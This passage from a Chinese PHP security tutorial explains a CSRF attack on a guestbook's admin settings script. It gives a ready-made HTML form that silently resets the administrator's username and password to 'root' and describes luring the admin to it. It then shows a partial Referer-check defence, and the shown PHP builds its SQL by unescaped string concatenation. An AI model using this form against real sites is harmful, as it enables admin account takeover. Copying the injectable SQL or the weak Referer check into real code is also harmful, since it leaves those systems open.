会员登录 | 会员注册 | 意见建议 | 网站地图

站长资源综合门户

公告:网站改版中,敬请期待。
当前位置:首页 > 站长学院 > 编程程序 > PHP漏洞全解

PHP漏洞全解

时间:2012-04-16 18:41:07   作者:   来源:   点击:

$password=md5($_POST["password"]);
if(empty($_POST["password"]))
{
$sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
}
else
{
$sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "<script language=’javascript’>"; 
echo "alert(‘修改成功!’);";
echo " location=’pass.php’;"; 
echo "</script>";
}
这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:
<body>
<form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
<input type="radio" value="1"  name="sh">
<input type="radio" name="sh" checked value="0"> 
<input type="text" name="username" value="root">
<input type="password" name="password" value="root"> 
<input type="text"  name="title"  value="随缘网络PHP留言板V1.0(带审核功能)" >
<textarea  name="gg"  rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!</textarea>
<textarea  name="copyright"  rows="6" cols="80" >随缘网络PHP留言本V1.0  版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名</textarea>
</form>
</body>
存为attack.html,放到自己网站上.sectop/attack.html,此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root

防范方法
防范CSRF要比防范其他攻击更加困难,因为CSRF的HTTP请求虽然是攻击者伪造的,但是却是由目标用户发出的,一般常见的防范方法有下面几种:
1、检查网页的来源
2、检查内置的隐藏变量
3、使用POST,不要使用GET
检查网页来源
在//pass.php头部加入以下红色字体代码,验证数据提交

if($_GET["act"])
{
if(isset($_SERVER["HTTP_REFERER"]))
{
        $serverhost = $_SERVER["SERVER_NAME"];
        $strurl   = str_replace("http://","",$_SERVER["HTTP_REFERER"]);  
        $strdomain = explode("/",$strurl);           
        $sourcehost    = $strdomain[0];              
        if(strncmp($sourcehost, $serverhost, strlen($serverhost)))
        {
                unset($_POST);
                echo "<script language=’javascript’>"; 
                echo "alert(‘数据来源异常!’);";
      &
nbsp;         echo " location=’index.php’;"; 
                echo "</script>";
        }
}
$username=$_POST["username"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["title"];
$copyright=$_POST["copyright"]."<br/>设计制作:<a href=.115cn>厦门随缘网络科技</a>";

分享到:

阅读此篇文章的网友还阅读了:

  • 2012-04-09亲历百度作全站301跳转后的阵痛
  • 2012-04-06分享:Discuz! x2论坛url标准化全攻略
  • 2012-04-06php运用readfile函数给隐藏下载文件地址增加权限判断
  • 2012-04-05Openbiz 实现 PHP的元数据编程
  • 2012-04-04PHP+新浪微博开放平台+新浪云平台(SAE)开发微博应用基础
  • 2012-04-04PHP+新浪微博开放平台+新浪云平台(SAE)开发微博应用——
  • 2012-04-04新浪微博开放平台PHP 类 WeiboClient 说明
  • 2012-04-04PHP程序员最常犯的11个MySQL错误
  • 2012-04-01最全discuz!X2去除forum.php尾巴的体例
  • 2012-04-01Linux服务器安全初始化Shell脚本

    • 网友评论

    推荐编程程序

    热门编程程序

    随机编程程序

    关于我们 | 联系我们 | 广告服务 | 意见建议 | 网站地图 | 版权声明 | 帮助中心 |

    Copyright © 2011-2013 版权所有

    本站所有内容均来自互联网,版权归原创者所有,如果侵犯了你的权益,请通知我们,我们会及时删除侵权内容!